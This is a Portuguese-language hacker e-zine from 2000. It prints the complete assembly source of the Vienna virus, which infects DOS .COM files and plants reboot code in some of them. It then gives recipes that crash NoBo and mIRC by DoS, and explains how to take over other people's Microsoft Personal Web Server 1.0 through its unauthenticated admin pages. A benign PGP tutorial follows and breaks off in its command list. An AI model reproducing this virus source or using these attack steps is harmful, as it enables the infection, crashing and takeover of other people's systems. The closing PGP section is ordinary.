                   UTILIZE ALGUM EDITOR DE TEXTO 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
<<<<<<<<<<<<<<<<<<<<<<<<< Cr1m6.br Zine Corp >>>>>>>>>>>>>>>>>>>>>>>>>
//////////////////////////00 18/07/2000 00\\\\\\\\\\\\\\\\\\\\\\\\\\\\
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>                  

                          
                                    
                          
                                  
                      .   

<<<<<<<<<<<<<<<<<<<<<<< www.cr1m6brzine.hpg.com.br >>>>>>>>>>>>>>>>>>>
                      NOSSO RESVITA TODO MS NA WEB 


INDEX
*****

1- INTRODUO ...................................CrAsHbOy
2- VRII ........................................CrAsHbOy
3- NOBO 1.2 DoS (Part 1) ........................CrAsHbOy
4- BUGZ .........................................CrAsHbOy
5- CRIPTOGRFIA PGP .............................CrAsHbOy
6- FRONTPAGE97 DoS (Part 2)......................CrAsHbOy
7- DICIONRIO DA INTERNET........................CrAsHbOy 
8 - FRASES .....................................CrAsHbOy
9 - BONUS ......................................CrAsHbOy

**************
*1-INTRODUO*
**************
Ol pessoal,  tudo beleza com vocs? Quero dizer que no somos hackers. 
soh estudamos sobre o assunto hacker; o que  e como faz para hackear etc.
Acho que com ajuda desse e-zine voc podemelhorar seu conhecimento pela 
net e ter algumas informaes daquilo que voc quer.Bem ns do Cr1m6.br 
Zine Corp no estamos nem ai para aqueles que querem mais e foder os 
administradores e provedores. Ns tambem no nos responsabilizamos pelo mal 
uso dessas informaes.Tudo que ns queremose informar as pessoas sobre o risco 
que a Internet lhes oferece. Aqui voc pode pegar em nossa sesso de virii cdigos 
em linguagems assembley e qbasic e vrus conhecidos e novos para entrar 
em contado com agente cr1m6.br@bol.com.br.

*********
*2-VRII*
*********
Coloquei codigo de um virri famoso em assembler o "Vienna" para publicar na nossa primeira
edio,porque eu no saco nada sobre virri,entao os bichos que sacarem se
quiserem publicar seus viriis aqui nessa sesso e so entrar em contato
cr1m6.br@bol.com.br.

---------------------------------corte aqui----------------------------------


MOV_CX  MACRO   X
        DB      0B9H
        DW      X
ENDM


CODE    SEGMENT
        ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
        ORG     $+0100H

;*****************************************************************************
;Start out with a JMP around the remains of the original .COM file, into the
;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS.
;The rest of the file (first 3 bytes) are stored in the virus data area.
;*****************************************************************************

VCODE:  JMP     virus


;This was the rest  of the original .COM file. Tiny and simple, this time

        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP


;************************************************************
;              The actual virus starts here
;************************************************************

v_start equ     $


virus:  PUSH    CX
        MOV     DX,OFFSET vir_dat       ;This is where the virus data starts.
                                        ; The 2nd and 3rd bytes get modified.
        CLD                             ;Pointers will be auto INcremented
        MOV     SI,DX                   ;Access data as offset from SI
        ADD     SI,first_3              ;Point to original 1st 3 bytes of .COM
        MOV     DI,OFFSET 100H          ;`cause all .COM files start at 100H
        MOV     CX,3
        REPZ    MOVSB                   ;Restore original first 3 bytes of .COM
        MOV     SI,DX                   ;Keep SI pointing to the data area

;*************************************************************
;                   Check the DOS version
;*************************************************************

        MOV     AH,30H
        INT     21H

        CMP     AL,0                    ;0 means it's version 1.X

        JNZ     dos_ok                  ;For version 2.0 or greater
        JMP     quit                    ;Don't try to infect version 1.X


;*************************************************************
;  Here if the DOS version is high enough for this to work
;*************************************************************

dos_ok: PUSH    ES


;*************************************************************
;               Get DTA address into ES:BX
;*************************************************************

        MOV     AH,2FH
        INT     21H

;*************************************************************
;                    Save the DTA address
;*************************************************************


        MOV     [SI+old_dta],BX
        MOV     [SI+old_dts],ES         ;Save the DTA address

        POP     ES

;*************************************************************
;        Set DTA to point inside the virus data area
;*************************************************************

        MOV     DX,dta                  ;Offset of new DTA in virus data area
;       NOP                             ;MASM will add this NOP here
        ADD     DX,SI                   ;Compute DTA address
        MOV     AH,1AH
        INT     21H                     ;Set new DTA to inside our own code


        PUSH    ES
        PUSH    SI
        MOV     ES,DS:2CH
        MOV     DI,0                    ;ES:DI points to environment

;************************************************************
;        Find the "PATH=" string in the environment
;************************************************************

find_path:
        POP     SI
        PUSH    SI                      ;Get SI back
        ADD     SI,env_str              ;Point to "PATH=" string in data area
        LODSB
        MOV     CX,OFFSET 8000H         ;Environment can be 32768 bytes long
        REPNZ   SCASB                   ;Search for first character
        MOV     CX,4

;************************************************************
;       Loop to check for the next four characters
;************************************************************

check_next_4:
        LODSB
        SCASB
        JNZ     find_path               ;If not all there, abort & start over
        LOOP    check_next_4            ;Loop to check the next character

        POP     SI
        POP     ES
        MOV     [SI+path_ad],DI         ;Save the address of the PATH
        MOV     DI,SI
        ADD     DI,wrk_spc              ;File name workspace
        MOV     BX,SI                   ;Save a copy of SI
        ADD     SI,wrk_spc              ;Point SI to workspace
        MOV     DI,SI                   ;Point DI to workspace
        JMP     SHORT   slash_ok


;**********************************************************
;     Look in the PATH for more subdirectories, if any
;**********************************************************

set_subdir:
        CMP     WORD PTR [SI+path_ad],0 ;Is PATH string ended?
        JNZ     found_subdir            ;If not, there are more subdirectories
        JMP     all_done                ;Else, we're all done


;**********************************************************
;    Here if there are more subdirectories in the path
;**********************************************************

found_subdir:
        PUSH    DS
        PUSH    SI
        MOV     DS,ES:2CH               ;DS points to environment segment
        MOV     DI,SI
        MOV     SI,ES:[DI+path_ad]      ;SI = PATH address
        ADD     DI,wrk_spc              ;DI points to file name workspace


;***********************************************************
;      Move subdirectory name into file name workspace
;***********************************************************

move_subdir:
        LODSB                           ;Get character
        CMP     AL,';'                  ;Is it a ';' delimiter?
        JZ      moved_one               ;Yes, found another subdirectory
        CMP     AL,0                    ;End of PATH string?
        JZ      moved_last_one          ;Yes
        STOSB                           ;Save PATH marker into [DI]
        JMP     SHORT   move_subdir

;******************************************************************
; Mark the fact that we're looking through the final subdirectory
;******************************************************************

moved_last_one:
        MOV     SI,0


;******************************************************************
;              Here after we've moved a subdirectory
;******************************************************************

moved_one:
        POP     BX                      ;Pointer to virus data area
        POP     DS                      ;Restore DS
        MOV     [BX+path_ad],SI         ;Address of next subdirectory
        NOP

;******************************************************************
;             Make sure subdirectory ends in a "\"
;******************************************************************

        CMP     CH,'\'                  ;Ends with "\"?
        JZ      slash_ok                ;If yes
        MOV     AL,'\'                  ;Add one, if not
        STOSB


;******************************************************************
;     Here after we know there's a backslash at end of subdir
;******************************************************************

slash_ok:
        MOV     [BX+nam_ptr],DI         ;Set filename pointer to name workspace
        MOV     SI,BX                   ;Restore SI
        ADD     SI,f_spec               ;Point to "*.COM"
        MOV     CX,6
        REPZ    MOVSB                   ;Move "*.COM",0 to workspace

        MOV     SI,BX


;*******************************************************************
;                 Find first string matching *.COM
;*******************************************************************

        MOV     AH,4EH
        MOV     DX,wrk_spc
;       NOP                             ;MASM will add this NOP here
        ADD     DX,SI                   ;DX points to "*.COM" in workspace
        MOV     CX,3                    ;Attributes of Read Only or Hidden OK
        INT     21H

        JMP     SHORT   find_first


;*******************************************************************
;              Find next ASCIIZ string matching *.COM
;*******************************************************************

find_next:
        MOV     AH,4FH
        INT     21H

find_first:
        JNB     found_file              ;Jump if we found it
        JMP     SHORT   set_subdir      ;Otherwise, get another subdirectory

;*******************************************************************
;                      Here when we find a file
;*******************************************************************

found_file:
        MOV     AX,[SI+dta_tim]         ;Get time from DTA
        AND     AL,1FH                  ;Mask to remove all but seconds
        CMP     AL,1FH                  ;62 seconds -> already infected
        JZ      find_next               ;If so, go find another file

        CMP     WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long?
        JA      find_next               ;If too long, find another one

        CMP     WORD PTR [SI+dta_len],0AH ;Is it too short?
        JB      find_next               ;Then go find another one

        MOV     DI,[SI+nam_ptr]         ;DI points to file name
        PUSH    SI                      ;Save SI
        ADD     SI,dta_nam              ;Point SI to file name

;********************************************************************
;                Move the name to the end of the path
;********************************************************************

more_chars:
        LODSB
        STOSB
        CMP     AL,0
        JNZ     more_chars              ;Move characters until we find a 00


;********************************************************************
;                        Get File Attributes
;********************************************************************

        POP     SI
        MOV     AX,OFFSET 4300H
        MOV     DX,wrk_spc              ;Point to \path\name in workspace
;       NOP                             ;MASM will add this NOP here
        ADD     DX,SI
        INT     21H


        MOV     [SI+old_att],CX         ;Save the old attributes


;********************************************************************
;         Rewrite the attributes to allow writing to the file
;********************************************************************

        MOV     AX,OFFSET 4301H         ;Set attributes
        AND     CX,OFFSET 0FFFEH        ;Set all except "read only" (weird)
        MOV     DX,wrk_spc              ;Offset of \path\name in workspace
;       NOP                             ;MASM will add this NOP here
        ADD     DX,SI                   ;Point to \path\name
        INT     21H

;********************************************************************
;                Open Read/Write channel to the file
;********************************************************************

        MOV     AX,OFFSET 3D02H         ;Read/Write
        MOV     DX,wrk_spc              ;Offset to \path\name in workspace
;       NOP                             ;MASM will add this NOP here
        ADD     DX,SI                   ;Point to \path\name
        INT     21H

        JNB     opened_ok               ;If file was opened OK
        JMP     fix_attr                ;If it failed, restore the attributes


;*******************************************************************
;                        Get the file date & time
;*******************************************************************

opened_ok:
        MOV     BX,AX
        MOV     AX,OFFSET 5700H
        INT     21H

        MOV     [SI+old_tim],CX         ;Save file time
        MOV     [SI+ol_date],DX         ;Save the date

;*******************************************************************
;                        Get current system time
;*******************************************************************

        MOV     AH,2CH
        INT     21H


        AND     DH,7                    ;Last 3 bits 0? (once in eight)
        JNZ     seven_in_eight


;*******************************************************************
; The special "one in eight" infection. If the above line were in
;  its original form, this code would be run 1/8 of the time, and
;  rather than appending a copy of this virus to the .COM file, the
;  file would get 5 bytes of code that reboot the system when the
;  .COM file is run.
;*******************************************************************


        MOV     AH,40H                  ;Write to file
        MOV     CX,5                    ;Five bytes
        MOV     DX,SI
        ADD     DX,reboot               ;Offset of reboot code in data area
        INT     21H

        JMP     SHORT   fix_time_stamp

        NOP


;******************************************************************
;      Here's where we infect a .COM file with this virus
;******************************************************************

seven_in_eight:
        MOV     AH,3FH
        MOV     CX,3
        MOV     DX,first_3
;       NOP                     ;MASM will add this NOP here
        ADD     DX,SI
        INT     21H             ;Save first 3 bytes into the data area

        JB      fix_time_stamp  ;Quit, if read failed

        CMP     AX,3            ;Were we able to read all 3 bytes?
        JNZ     fix_time_stamp  ;Quit, if not


;******************************************************************
;              Move file pointer to end of file
;******************************************************************

        MOV     AX,OFFSET 4202H
        MOV     CX,0
        MOV     DX,0
        INT     21H

        JB      fix_time_stamp  ;Quit, if it didn't work

        MOV     CX,AX           ;DX:AX (long int) = file size
        SUB     AX,3            ;Subtract 3 (OK, since DX must be 0, here)
        MOV     [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction

        ADD     CX,OFFSET c_len_y
        MOV     DI,SI           ;Point DI to virus data area
        SUB     DI,OFFSET c_len_x
                                ;Point DI to reference vir_dat, at start of pgm
        MOV     [DI],CX         ;Modify vir_dat reference:2nd, 3rd bytes of pgm


;*******************************************************************
;                    Write virus code to file
;*******************************************************************

        MOV     AH,40H

        MOV_CX  virlen                  ;Length of virus, in bytes

        MOV     DX,SI
        SUB     DX,OFFSET codelen       ;Length of virus code, gives starting
                                        ; address of virus code in memory
        INT     21H

        JB      fix_time_stamp          ;Jump if error

        CMP     AX,OFFSET virlen        ;All bytes written?
        JNZ     fix_time_stamp          ;Jump if error


;**********************************************************************
;                Move file pointer to beginning of the file
;**********************************************************************

        MOV     AX,OFFSET 4200H
        MOV     CX,0
        MOV     DX,0
        INT     21H

        JB      fix_time_stamp          ;Jump if error


;**********************************************************************
;              Write the 3 byte JMP at the start of the file
;**********************************************************************

        MOV     AH,40H
        MOV     CX,3
        MOV     DX,SI                   ;Virus data area
        ADD     DX,jmp_op               ;Point to the reconstructed JMP
        INT     21H


;**********************************************************************
;       Restore old file date & time, with seconds modified to 62
;**********************************************************************

fix_time_stamp:
        MOV     DX,[SI+ol_date]         ;Old file date
        MOV     CX,[SI+old_tim]         ;Old file time
        AND     CX,OFFSET 0FFE0H
        OR      CX,1FH                  ;Seconds = 31/30 min = 62 seconds
        MOV     AX,OFFSET 5701H
        INT     21H


;**********************************************************************
;                              Close File
;**********************************************************************

        MOV     AH,3EH
        INT     21H


;**********************************************************************
;                     Restore Old File Attributes
;**********************************************************************

fix_attr:
        MOV     AX,OFFSET 4301H
        MOV     CX,[SI+old_att]         ;Old Attributes
        MOV     DX,wrk_spc
;       NOP                             ;MASM will add this NOP
        ADD     DX,SI                   ;DX points to \path\name in workspace
        INT     21H


;**********************************************************************
;              Here when it's time to close it up & end
;**********************************************************************

all_done:
        PUSH    DS


;**********************************************************************
;                         Restore old DTA
;**********************************************************************

        MOV     AH,1AH
        MOV     DX,[SI+old_dta]
        MOV     DS,[SI+old_dts]
        INT     21H

        POP     DS


;*************************************************************************
; Clear registers used, & do a weird kind of JMP 100. The weirdness comes
;  in since the address in a real JMP 100 is an offset, and the offset
;  varies from one infected file to the next. By PUSHing an 0100H onto the
;  stack, we can RET to address 0100H just as though we JMPed there.
;**********************************************************************

quit:
        POP     CX
        XOR     AX,AX
        XOR     BX,BX
        XOR     DX,DX
        XOR     SI,SI
        MOV     DI,OFFSET 0100H
        PUSH    DI
        XOR     DI,DI

        RET     0FFFFH

;************************************************************************
;The virus data starts here. It's accessed off the SI register, per the
; comments as shown
;************************************************************************

vir_dat EQU     $


        ;Use this with (SI + old_dta)
olddta_ DW      0                       ;Old DTA offset

        ;Use this with (SI + old_dts)
olddts_ DW      0                       ;Old DTA segment

        ;Use this with (SI + old_tim)
oldtim_ DW      0                       ;Old Time

        ;Use this with (SI + ol_date)
oldate_ DW      0                       ;Old date

        ;Use this with (SI + old_att)
oldatt_ DW      0                       ;Old file attributes



;Here's where the first three bytes of the original .COM file go.(SI + first_3)

first3_ EQU     $
        INT     20H
        NOP



;Here's where the new JMP instruction is worked out

        ;Use this with (SI + jmp_op)
jmpop_  DB      0E9H                    ;Start of JMP instruction

        ;Use this with (SI + jmp_dsp)
jmpdsp_ DW      0                       ;The displacement part



;This is the type of file  we're looking to infect. (SI + f_spec)

fspec_  DB      '*.COM',0

        ;Use this with (SI + path_ad)
pathad_ DW      0                       ;Path address

        ;Use this with (SI + nam_ptr)
namptr_ DW      0                       ;Pointer to start of file name

        ;Use this with (SI + env_str)
envstr_ DB      'PATH='                 ;Find this in the environment

        ;File name workspace (SI + wrk_spc)
wrkspc_ DB      40h dup (0)

        ;Use this with (SI + dta)
dta_    DB      16h dup (0)             ;Temporary DTA goes here

        ;Use this with (SI + dta_tim)
dtatim_ DW      0,0                     ;Time stamp in DTA

        ;Use this with (SI + dta_len)
dtalen_ DW      0,0                     ;File length in the DTA

        ;Use this with (SI + dta_nam)
dtanam_ DB      0Dh dup (0)             ;File name in the DTA

        ;Use this with (SI + reboot)
reboot_ DB      0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0


lst_byt EQU     $                       ;All lines that assemble into code are
                                        ;  above this one


;*****************************************************************************
;The virus needs to know a few details about its own size and the size of its
; code portion. Let the assembler figure out these sizes automatically.
;*****************************************************************************

virlen  =       lst_byt - v_start       ;Length, in bytes, of the entire virus
codelen =       vir_dat - v_start       ;Length of virus code, only
c_len_x =       vir_dat - v_start - 2   ;Displacement for self-modifying code
c_len_y =       vir_dat - v_start + 100H ;Code length + 100h, for PSP


;*****************************************************************************
;Because this code is being appended to the end of an executable file, the
; exact address of its variables cannot be known. All are accessed as offsets
; from SI, which is represented as vir_dat in the below declarations.
;*****************************************************************************

old_dta =       olddta_ - vir_dat       ;Displacement to the old DTA offset
old_dts =       olddts_ - vir_dat       ;Displacement to the old DTA segment
old_tim =       oldtim_ - vir_dat       ;Displacement to old file time stamp
ol_date =       oldate_ - vir_dat       ;Displacement to old file date stamp
old_att =       oldatt_ - vir_dat       ;Displacement to old attributes
first_3 =       first3_ - vir_dat       ;Displacement-1st 3 bytes of old .COM
jmp_op  =       jmpop_  - vir_dat       ;Displacement to the JMP opcode
jmp_dsp =       jmpdsp_ - vir_dat       ;Displacement to the 2nd 2 bytes of JMP
f_spec  =       fspec_  - vir_dat       ;Displacement to the "*.COM" string
path_ad =       pathad_ - vir_dat       ;Displacement to the path address
nam_ptr =       namptr_ - vir_dat       ;Displacement to the filename pointer
env_str =       envstr_ - vir_dat       ;Displacement to the "PATH=" string
wrk_spc =       wrkspc_ - vir_dat       ;Displacement to the filename workspace
dta     =       dta_    - vir_dat       ;Displacement to the temporary DTA
dta_tim =       dtatim_ - vir_dat       ;Displacement to the time in the DTA
dta_len =       dtalen_ - vir_dat       ;Displacement to the length in the DTA
dta_nam =       dtanam_ - vir_dat       ;Displacement to the name in the DTA
reboot  =       reboot_ - vir_dat       ;Displacement to the 5 byte reboot code

        CODE    ENDS
END     VCODE

------------------------------------corte aqui--------------------------------------

*************************
*3-NOBO 1.2 DoS (Part 1)*
*************************
DoS foi achado pela bugtraq (http://listserv.ntbugtraq.com/)
funciona no Windows95 e 98
NoBo 1.2 escuta na porta 31337 Back Orifice enviando 15 pacotes de
UDP 10040 bytes chocar nobo em kernel32.dll, eu testei isso no
windows95 e funfo utilizando "assault" no assault coloque host
do lammer,coloque porta 31337 em size coloque 10040 e em packets coloque
tambem 10040 ai e so enviar CrAsH. 

NOBO12 causou uma falha de pilha no mdulo KERNEL32.DLL em 0137:bff725c5.
Registradores:
EAX=002a0037 CS=0137 EIP=bff725c5 EFLGS=00000283
EBX=ffab5000 SS=013f ESP=0054f91a EBP=0054f92e
ECX=815c01a4 DS=013f ESI=0054f93e FS=2c9f
EDX=815c01a4 ES=013f EDI=815c01a4 GS=3587
Bytes em CS:EIP:
6a ff e8 d0 85 01 00 eb e7 55 8b ec 56 57 53 8b 
Esvaziamento da pilha:
ffab5000 815c01b4 0054f93e 00000000 00000000 0054f988 bff7294f 815c01a4 0054f93e 
17bf1d42 016f0028 00040010 00010000 005c0000 00000000 ffff0040 

******** 
*4-BUGZ*
********
Sistema:Windows95 
Programa:Microsoft Servidor Web (Version 1.0) do windows 95 soh entrar la em painel de controle
e rede que vc encontra o Servidor Web..
Bug no Microsoft Servidor Web (Version 1.0)
Configurao do servidor e feita via web assim voc pode invadir o servidor
web mexeno nas configuraes da page.Com essa dica acho que vai dar oque 
falar nos 95 ai da internet.Para hackiar voc pricisa saber se a version e 1.0 
do servidor se for vc pode colocar endereo abaixo e hackiar assim colocar
ip certo por ex: http://200.203.456.67/htmla/htmla.html ip dele
na internet e entrar no administrador de servios da internet
e fazer oque vc quiser no servidor hehehehehe. 

Administrador de Servios:
http://127.0.0.1/htmla/htmla.htm

Administrador FTP: 
http://127.0.0.1/HtmlaScripts/htmla.dll?ftp/serv
hehehe vc pode mudar diretorio Home para c:\...

Administrador WWW:
http://127.0.0.1/HtmlaScripts/htmla.dll?http/serv

**********
*MIRC 5.6*
**********

Abra o mirc e digite 
/server irc.coloque 100 ou + caracteres e conecte,
Mirc vai aparecer a famosa tela, Este programa executou 
uma operao ilegal e ser fechado 

MIRC32 causou uma falha de pgina invlida no
mdulo MIRC32.EXE em 014f:004c8da4.
Registradores:
EAX=7a7a7a7e CS=014f EIP=004c8da4 EFLGS=00010206
EBX=00000a2e SS=0157 ESP=0077fb64 EBP=0077fb78
ECX=00000000 DS=0157 ESI=004f5da8 FS=0e97
EDX=7a7a7a7a ES=0157 EDI=011e8498 GS=0000
Bytes em CS:EIP:
f6 40 fc ff 74 11 f6 40 fd ff 74 0c f6 40 fe ff 
Esvaziamento da pilha:
00497c07 7a7a7a7a 004f5e70
004f5e44 004f5d14 0077fba4 
0049697e 011e8498 00000a2e
00000000 00000000 000002a4 
00000163 00000002 004ed7bc 
00000b10 

*************
*KRNL386.EXE*
*************
Vou explica como derruba seu windows9x atraves do kernel do windows
nucleo do sistema ento vamos-la

Voc s tem que entrar no MS-DOS digitar isso.

c:\windows\system\krnl386.exe 

Depois vai aperece uma tela +- assim

Esse programa executou uma operao ilegal. Feche
todos programas reinicie seu computador.

Depois disso voc vai tentar executar algum programa no windows
vai dar erro vai travar tambem ae vc tem que reset sua CPU e mole.

Kernel32

********************
*5-CRIPTOGRFIA PGP*
********************
INTRODUCAO A CRiPTOGRAFiA (VOLTADA AO PGP)
fonte: Henrique de Moraes <henriq0@fee.unicamp.br>
      
Por este ser o primeiro zine que escrevo, resolvi tocar neste assun-        
to por que ele eh de grande importancia para aqueles que se interessam pelos
assuntos da comunidade hacker e tambem para aqueles que gostam de ter priva-
cidade em suas mensagens.
Do que eu estou falando? PGP seria a resposta certa  ou  Pretty Good
Privacy,  um  programinha criado por Philip R. Zimmermann (PRZ) e posterior-
mente desenvolvido  por  uma equipe  internacional de programadores,  com  o
objetivo de disponibilizar ao publico mundial a criptografia de boa qualida-
de com nivel de seguranca militar.  Existem versoes do PGP para todos os ti-
pos de computadores  e  sistemas operacionais existentes,  mais adiante mos-
trarei aonde encontrar estes arquivos.

PORQUE VOCE PRECiSA DE CRiPTOGRAFiA?
        
Nem tudo que escrevemos eh publico. Mas muitas vezes escrevemos tex-
tos extremamente embaracosos e/ou sensiveis, que desejamos que ninguem leia,
exceto determinada pessoa. Um exemplo tipico disto sao as redes de mensagens
contidas em bbs, tudo que voce escreve nela, nao importando se eh enderecado
a tal usuario, os sysops podem ler com a maior facilidade. Por isso digo que
em qualquer que seja o caso,  o texto que voce escreveu nao  diz respeito  a
mais ninguem, a nao ser o seu destinatario. Seguindo  essa  filosofia  foram
criadas leis que defendem a privacidade  postal  e  as telecomunicacoes, mas
que provavelmente nao  sao  mais  validas devido a criacao da LEI-EMAIL, lei
No. 9.296, de 24 de julho de 1996, que  permite a leitura de e-mail para uso
de prova no tribunal. Nao irei entrar em detalhes pois a lei eh muito exten-
sa e sairia do assunto, poderei coloca-la no proximo numero. Entao a solucao
eh criptografar as suas  mensagens.  Uma mensagem criptografada nao pode ser
lida por ninguem, exceto por aquelas  pessoas que souberem decifrar o codigo
e/ou possuirem a chave necessaria para tanto.
Portanto, mesmo que sua mensagem criptografada seja interceptada,ela
nao podera ser lida. Pode ate ser destruida,  mas  ninguem nunca ira saber o 
que ela continha, a menos que voce lhes diga a chave.

CRiPTOGRAFiA DE CHAVE PUBLiCA RSA 

A criptografia de chave publica faz uso de duas chaves. Vamos chama-
-las de chave A e chave B.  Tais  chaves sao distintas porem possuem uma es-
treita relacao entre si:

O que for codificado por A somente podera se decodificado por B e
O que for codificado por B somente podera se decodificado por A.

Portanto:
O que for codificado por A NAO PODERA ser decodificado por A
O que for codificado por B NAO PODERA ser decodificado por B

Em outras palavras,  eh preciso  ambas  as  chaves para que um texto
possa ser codificado e posteriormente lido.
Agora suponhamos que A seja uma chave que voce possua(vamos chama-la
de "chave secreta") e que B seja uma chave que voce tenha  distribuido  para
seus amigos e colegas de trabalho(vamos chama-la de "chave publica").

Voce:    Possue as chaves A e B (Secreta e Publica)
Outros:  Possuem APENAS a chave B (Publica)

Neste caso,  os seus amigos poderiam cifrar uma mensagem com a chave
publica(a UNICA que eles possuem).  Como a chave publica nao pode decifrar o
que ela mesmo cifrou,  nem eles  nem nimguem mais poderia ler a mensagem ci-
frada, exceto voce que possue a chave secreta.

        +---------+                                    +-----------+
        |  TEXTO  |                                    | TEXTO QUE |
   +-->>|         |---->>[Outros: Chave Publica]----->>|    FOI    |
   |    |  NORMAL |        mao unica s/ retorno        |  CIFRADO  |
   |    +---------+                                    +-----------+
   |                                                         |
   |                                      sua correspondecia | e-mail
   |                                         ou mensagem via | bbs
   |    +--[COMPUTADOR SEGURO: O SEU]--+                     |
   |    |                              |                     |
   +--<<<<---[Voce: Chave Secreta]----<<<<-------------------+
        |                              |          
        +------------------------------+

Repetindo: Alguem pega a chave publica e codifica uma  mensagem para
voce. ESSA MENSAGEM AGORA ESTA CIFRADA E SEGURA.  A pessoa  entao manda essa
mensagem para  voce, atraves de qualquer meio. APENAS VOCE, quando receber a
mensagem  cifrada, sera capaz de decodifica-la utilizando a sua chave SECRE-
TA.

APRENDENDO A USAR PGP 

Em primeiro lugar onde conseguir tao falado PGP? E so digitar PGP em
qualquer site  search  tipo Altavista, Yahoo, que aparece um montao de sites
para pegar.

Depois de ter descompactado o arquivo,  voce  precisa  gerar  a  sua
chave publica e privada, daqui em diante vamos mostrar como proceder.

* Nao esqueca de setar a variavel tz. Veja como:

        SET TZ=0

* Agora voce precisa gerar seu par de chaves RSA (Publica e Secreta):

        pgp -kg

O resultado serao dois arquivos SECRING.PGP(Secreto) e PUBRING.PGP(Publico).
E bom fazer um backup desses  dois  somente por seguranca.  Caso precise dos
originais novamente.

* Para gerar um arquivo .ASC contendo sua Chave Publica para distribuir:

        pgp -kxa [seu_user_id] [arq_d_destino](sem extensao)

Agora voce ja gerou sua chave publica e secreta, tambem ja possuem um arqui-
vo .ASC contendo sua chave publica para distribuicao. Entao voce ja pode re-
ceber e enviar suas mensagens encriptografadas.

* Como fazer para enviar uma mensagem encriptografada, via email:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzL8kSMAAAEEAL3FFyEfAhB1tU0XGyRt3XQyQKZpMCnkcE07cV5lHW3CSADG
Akln5vyr1T2wdn6umd2AYbkIiWQ76HXGyZjXtUFfFn/LIqXbtYubqXYqlSvT8uoA
pC6N1FrBPl7asQ/6NRFK8jzboGPv7Lu2qodqqK7hzNN+I0V7/2gAtERvzAeRAAUR
tB5dbk9mQWNFWyA8bm9mYWNleEBob3RtYWlsLmNvbT6JAJUDBRAy/JEkaAC0RG/M
B5EBAdLbBACBNqsHZIBUeFSMtfuiYwHB3Tu5GOOq1Pxvn1C9gNdJrkJHda33HN/e
isc/dTqSIVMuxuKOW6DnZhUt3PEi7y8EV4WTAILocPVeFbpg4vTLlH38YcQD3bYo
dbqmIC8sXSrIXZLvdlBQNrKfar91pNtg9qOZ78TzyiDqKuOU173AYQ==
=gqsV
-----END PGP PUBLIC KEY BLOCK-----

Agora salve esta chave publica como noface.asc no diretorio onde se encontra
seu programa de PGP.

        pgp noface.asc

O programa vai perguntar se voce quer incluir essa  chave ao seu pubring.pgp
e  tambem conhecido como molho de chaves.  Responda "SIM", depois ele  ainda
pergunta sobre a certificacao da  chave,  se  voce nao souber o que eh isso,
responda "NAO".  Leia o manual  se estiver interessado em saber o que signi-
ca aquilo.

* Como encriptar uma mensagem

       pgp -ea arq_texto noface

O programa ira criptografar a mensagem de uma maneira que somente o destina-
tario no caso do exemplo eu podera ler.

* Como descriptografar a mensagem que eu recebeu?

       pgp arq_encriptado.txt

Agora o programa ira pedir a sua senha, a  que  voce  colocou la no inicio e
iniciara a desemcriptar a mensagem.

PS.:Os arquivos Secring.PGP e Pubring.PGP devem ficar no mesmo subdiretorio.

       Bem aqui foi um rapida explicacao sobre PGP,  com  isso voce  ja pode
mandar e receber suas mensagens encriptografadas.


 UMA BREVE REFERENCIA SOBRE OS COMANDOS DO PGP


* Para encriptar um arquivo com a chave publica do destinatario:

       pgp -e arq_texto user_id_dest

* Para assinar um arquivo com a sua chave secreta:

       pgp -s arq_texto [-u seu_user_id]

* Para assinar um arquivo de texto com a sua chave secreta e manter o resul-
tado legivel por  humanos (sem precisar rodar o PGP) [processo principal co-
nhecido como clean sign (assinatura limpa)]:

       pgp -sta arq_texto [-u seu_user_id]

* Para assinar um arquivo com a sua chave secreta,  e depois encripta-lo com
a chave publica do destinatario:

       pgp -es arq_texto user_id_dest [-u seu_user_id]

* Para encriptar um arquivo de texto usando apenas criptografia convencional

       pgp -c arq_texto

* Para decriptar um arquivo cifrado, ou para testar a integridade de  um ar-
quivo assinado:

       pgp arq_texto_cifrado [-o arq_texto_normal]

* Para encriptar uma mensagem para qualquer quantidade de multiplos destina-
tarios:

       pgp -e arq_texto User_Id1 User_Id2 User_Id3 ...

* Para gerar seu par de chaves RSA (publica e secreta) exclusivo:

       pgp -kg

* Para adicionar o conteudo de um arquivo de chaves publicas ou  secretas ao 
seu proprio molho de chaves publicas (ou secretas):

       pgp -ka arq_com_chaves [arq_molho_de_chaves]

* Para extrair (copiar) uma chave do seu molho pblico ou secreto:

       pgp -kx user_id arq_com_chaves [arq_molho_de_chaves]
ou:    pgp -kxa user_id arq_com_chaves [arq_molho_de_chaves]

* Para ver o conteudo do seu molho de chaves publicas (ou de qualquer  outro
molho de chaves):

       pgp -kv[v] [user_id] [arq_molho_de_chaves]

* Para ver a "impressao digital" de uma chave publica, que ajuda a verificar
a autenticidade de uma chave (ex: atraves do telefone):

       pgp -kvc [user_id] [arq_molho_de_chaves]

* Para ver o conteudo, analizar e testar os certificados de assinaturas (au-
tenticacoes) das chaves em um molho de chaves publicas:

       pgp -kc [User_Id] [arq_molho_de_chaves]

* Para editar a identificacao de usuario (user_id) ou  a  frase-senha de sua
chave secreta:

       pgp -ke User_Id [arq_molho_de_chaves]

* Para editar os parametros de confianca de uma chave publica:

       pgp -ke user_id [arq_molho_de_chaves]

* Para remover (deletar) uma  chave ou uma user_id (numa chave com multiplas
User_Ids) de um molho de chaves publicas:

       pgp -kr user_id [arq_molho_de_chaves]

* Para assinar (autenticar) a chave publica de outrem  que  esteja num molho
de chaves publicas:

       pgp -ks user_id_dest [-u seu_User_Id] [arq_molho_de_chaves]

* Para remover algumas das assinaturas (autenticacoes) de uma chave:

       pgp -krs user_id [arq_molho_de_chaves]

* Para revogar permanentemente sua propria chave, criando um  certificado de
comprometimento de chave secreta:

